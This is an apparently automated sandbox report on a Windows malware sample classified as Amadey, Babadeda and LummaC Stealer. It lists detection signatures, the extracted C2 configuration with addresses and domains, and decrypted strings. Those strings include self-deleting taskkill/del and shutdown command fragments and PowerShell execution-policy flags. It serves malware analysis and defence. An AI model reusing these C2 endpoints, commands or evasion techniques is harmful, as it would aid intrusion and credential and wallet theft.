Windows Analysis Report
Af3hqfTjFh.exe

Overview

General Information

Sample name: Af3hqfTjFh.exe (renamed because the original name is a hash value)
Original sample name: f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b.exe
Analysis ID: 1650509
MD5: 5ec95a42b16d80c72d17cc6d0bac58de
SHA1: 9cfd9221606e1acfef1ea5f6f4bf88080822d5db
SHA256: f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b
Tags: exety-ap-4t-comuser-JAMESWT_MHT

Detection

Amadey, Babadeda, LummaC Stealer
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Yara detected Amadey
Yara detected Amadeys Clipper DLL
Yara detected Babadeda
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected obfuscated html page
Allocates memory in foreign processes
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to start a terminal service
Creates HTA files
Found API chain indicative of sandbox detection
Hides threads from debuggers
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Sigma detected: HackTool - CACTUSTORCH Remote Thread Creation
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: PowerShell DownloadFile
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious New Service Creation
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to download and execute files (via powershell)
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Entry point lies outside standard sections
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Recursive Takeown
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Keylogger Generic

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Babadeda
Description: According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers' analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda

AV Detection

Source: Af3hqfTjFh.exe Avira: detected
Source: smeltingt.run/giiaus Avira URL Cloud: Label: malware
Source: weldorae.digital/geds Avira URL Cloud: Label: malware
Source: https://scenarisacri.top/gHSAYuqo& Avira URL Cloud: Label: malware
Source: ferromny.digital/gwpd Avira URL Cloud: Label: malware
Source: scenarisacri.top/gHSAYuqo Avira URL Cloud: Label: malware
Source: https://scenarisacri.top/gHSAYuqo Avira URL Cloud: Label: malware
Source: https://scenarisacri.top/ Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\7b35p_003[1].exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\10026630101\v7942.exe Avira: detection malicious, Label: TR/Injector.wtmyi
Source: C:\Users\user\AppData\Local\Temp\10352690101\7b35p_003.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\gron12321[1].exe Avira: detection malicious, Label: TR/Injector.wwtnv
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\amnew[1].exe Avira: detection malicious, Label: TR/Redcap.zvzjx
Source: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe Avira: detection malicious, Label: TR/Redcap.zvzjx
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\v7942[1].exe Avira: detection malicious, Label: TR/Injector.wtmyi
Source: C:\Users\user\AppData\Local\Temp\10001960101\gron12321.exe Avira: detection malicious, Label: TR/Injector.wwtnv
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\alex1dskfmdsf[1].exe Avira: detection malicious, Label: TR/Injector.vsfqf
Source: C:\Users\user\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe Avira: detection malicious, Label: TR/Injector.vsfqf
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp Malware Configuration Extractor: Amadey {"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}
Source: 24.2.MSBuild.exe.400000.0.raw.unpack Malware Configuration Extractor: LummaC {"C2 url": ["scenarisacri.top/gHSAYuqo", "oreheatq.live/gsopp", "castmaxw.run/ganzde", "weldorae.digital/geds", "steelixr.live/aguiz", "advennture.top/GKsiio", "targett.top/dsANGt", "smeltingt.run/giiaus", "ferromny.digital/gwpd"], "Build id": "ec5997459091fca87149615faef0cf4d"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\alex1dskfmdsf[1].exe ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\gron12321[1].exe ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\apple[1].exe ReversingLabs: Detection: 51%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\crypted.54[1].exe ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\EPTwCQd[1].exe ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\v7942[1].exe ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\7b35p_003[1].exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\amnew[1].exe ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\please18[1] ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\10001960101\gron12321.exe ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Temp\10026630101\v7942.exe ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\10041590101\crypted.exe ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Temp\10041600101\please18.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe ReversingLabs: Detection: 51%
Source: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\10352680101\d6a397c01b.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\10352690101\7b35p_003.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\10352700101\EPTwCQd.exe ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\22.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\ssisd.sys ReversingLabs: Detection: 62%
Source: Af3hqfTjFh.exe Virustotal: Detection: 49%
Source: Af3hqfTjFh.exe ReversingLabs: Detection: 52%
Source: Submitted Sample Neural Call Log Analysis: 99.8%
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: 176.113.115.6
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: /Ni9kiput/index.php
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: S-%lu-
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: bb556cff4a
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: rapes.exe
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: Startup
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: cmd /C RMDIR /s/q
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: rundll32
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: Programs
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: %USERPROFILE%
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: cred.dll|clip.dll|
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: cred.dll
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: clip.dll
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: http://
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: https://
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: /quiet
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: /Plugins/
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: &unit=
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: shell32.dll
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: kernel32.dll
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: GetNativeSystemInfo
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: ProgramData\
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: AVAST Software
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: Kaspersky Lab
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: Panda Security
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: Doctor Web
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: 360TotalSecurity
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: Bitdefender
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: Norton
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: Sophos
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: Comodo
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: WinDefender
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: 0123456789
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: ------
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: ?scr=1
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: ComputerName
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: -unicode-
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: VideoID
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: DefaultSettings.XResolution
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: DefaultSettings.YResolution
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: ProductName
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: CurrentBuild
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: rundll32.exe
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: "taskkill /f /im "
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: " && timeout 1 && del
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: && Exit"
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: " && ren
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: Powershell.exe
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: -executionpolicy remotesigned -File "
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: shutdown -s -t 0
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: random
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: Keyboard Layout\Preload
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: 00000419
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: 00000422
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: 00000423
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: 0000043f
Source: 24.2.MSBuild.exe.400000.0.raw.unpack String decryptor: scenarisacri.top/gHSAYuqo
Source: 24.2.MSBuild.exe.400000.0.raw.unpack String decryptor: oreheatq.live/gsopp
Source: 24.2.MSBuild.exe.400000.0.raw.unpack String decryptor: castmaxw.run/ganzde
Source: 24.2.MSBuild.exe.400000.0.raw.unpack String decryptor: weldorae.digital/geds
Source: 24.2.MSBuild.exe.400000.0.raw.unpack String decryptor: steelixr.live/aguiz
Source: 24.2.MSBuild.exe.400000.0.raw.unpack String decryptor: advennture.top/GKsiio
Source: 24.2.MSBuild.exe.400000.0.raw.unpack String decryptor: targett.top/dsANGt
Source: 24.2.MSBuild.exe.400000.0.raw.unpack String decryptor: smeltingt.run/giiaus
Source: 24.2.MSBuild.exe.400000.0.raw.unpack String decryptor: ferromny.digital/gwpd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0041C62B CryptUnprotectData, 24_2_0041C62B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0041B6A6 CryptUnprotectData, 24_2_0041B6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0041CA27 CryptUnprotectData, 24_2_0041CA27

Phishing

Source: Yara match File source: C:\Users\user\AppData\Local\Temp\tOEPAwmQl.hta, type: DROPPED

Compliance

Source: C:\Users\user\AppData\Local\Temp\22.exe Unpacked PE file: 29.2.22.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\22.exe Unpacked PE file: 32.2.22.exe.400000.0.unpack
Source: Af3hqfTjFh.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: apple.exe, 0000001C.00000003.1556143577.00000000061DA000.00000004.00000020.00020000.00000000.sdmp, apple.exe, 0000001C.00000000.1553491361.0000000000433000.00000002.00000001.01000000.00000015.sdmp, apple.exe, 0000001C.00000003.1556649104.00000000061E4000.00000004.00000020.00020000.00000000.sdmp, apple.exe, 0000001C.00000002.1561139167.0000000000433000.00000002.00000001.01000000.00000015.sdmp
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E4DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00E4DBBE
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E1C2A2 FindFirstFileExW, 0_2_00E1C2A2
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E568EE FindFirstFileW,FindClose, 0_2_00E568EE
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E5698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_00E5698F
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E4D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00E4D076
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E4D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00E4D3A9
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E59B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00E59B2B
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F4F2F4 FindFirstFileExW, 22_2_00007FF748F4F2F4
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F4F478 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 22_2_00007FF748F4F478
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73879F2F4 FindFirstFileExW, 25_2_00007FF73879F2F4
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73879F478 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 25_2_00007FF73879F478
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx] 24_2_00447100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx-11282DC2h] 24_2_00447100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov edx, dword ptr [ecx+esi+3Ch] 24_2_00447100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx-35D72F2Eh] 24_2_004101D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx esi, byte ptr [esp+eax+00000584h] 24_2_0041C2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp word ptr [edi+ebx], 0000h 24_2_0044B370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov dword ptr [esp], edx 24_2_00443390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax+0Ch] 24_2_0042F410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx esi, byte ptr [esp+eax+04h] 24_2_0044B4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, word ptr [eax] 24_2_0041054A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx esi, word ptr [eax] 24_2_0041054A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ebx, byte ptr [esp+edi+0AF2709Ah] 24_2_0044C5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx esi, byte ptr [esp+eax+1Ch] 24_2_004205B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], BEB994C9h 24_2_004205B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then jmp eax 24_2_004496F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+28A0A914h] 24_2_0044891F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov word ptr [eax], cx 24_2_004109E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov word ptr [ecx], dx 24_2_00411D51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov word ptr [eax], cx 24_2_0042C040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax-000000AEh] 24_2_00424073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax-000000AEh] 24_2_0042407C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000A0h] 24_2_0041D17F
